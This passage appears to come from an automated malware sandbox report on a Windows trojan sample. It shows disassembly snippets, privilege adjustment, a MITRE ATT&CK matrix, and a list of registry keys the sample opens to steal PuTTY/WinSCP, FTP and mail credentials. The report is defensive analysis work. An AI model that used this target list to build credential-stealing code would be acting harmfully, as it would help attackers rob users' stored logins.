            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 0_2_02B73AEC mov eax, dword ptr fs:[00000030h] 0_2_02B73AEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 0_2_02B729BA mov eax, dword ptr fs:[00000030h] 0_2_02B729BA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 0_2_02B71FFE mov eax, dword ptr fs:[00000030h] 0_2_02B71FFE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 0_2_02B729E3 mov eax, dword ptr fs:[00000030h] 0_2_02B729E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 0_2_02B76F6A mov eax, dword ptr fs:[00000030h] 0_2_02B76F6A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 1_2_005629E3 mov eax, dword ptr fs:[00000030h] 1_2_005629E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 1_2_00567CC0 mov eax, dword ptr fs:[00000030h] 1_2_00567CC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 1_2_00563AEC mov eax, dword ptr fs:[00000030h] 1_2_00563AEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 1_2_0056688A mov eax, dword ptr fs:[00000030h] 1_2_0056688A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 1_2_00566F6A mov eax, dword ptr fs:[00000030h] 1_2_00566F6A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 1_2_00561FFE mov eax, dword ptr fs:[00000030h] 1_2_00561FFE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 1_2_00562C78 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory, 1_2_00562C78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
            Tries to steal Mail credentials (via file access)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

            Mitre Att&ck Matrix

            Techniques listed per tactic column of the matrix (trailing digits are the report's per-technique count badges, kept as shown):
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows)
            Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
            Privilege Escalation: Process Injection 11; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
            Defense Evasion: Masquerading 1; Virtualization/Sandbox Evasion 22; Process Injection 11; Obfuscated Files or Information 1
            Credential Access: OS Credential Dumping 1; Credentials in Registry 1; Security Account Manager; NTDS
            Discovery: Security Software Discovery 321; Virtualization/Sandbox Evasion 22; Remote System Discovery 1; System Information Discovery 3
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
            Collection: Email Collection 1; Archive Collected Data 1; Data from Local System 1; Input Capture
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
            Command and Control: Encrypted Channel 1; Ingress Tool Transfer 2; Non-Application Layer Protocol 3; Application Layer Protocol 13
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud

            Behavior Graph

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet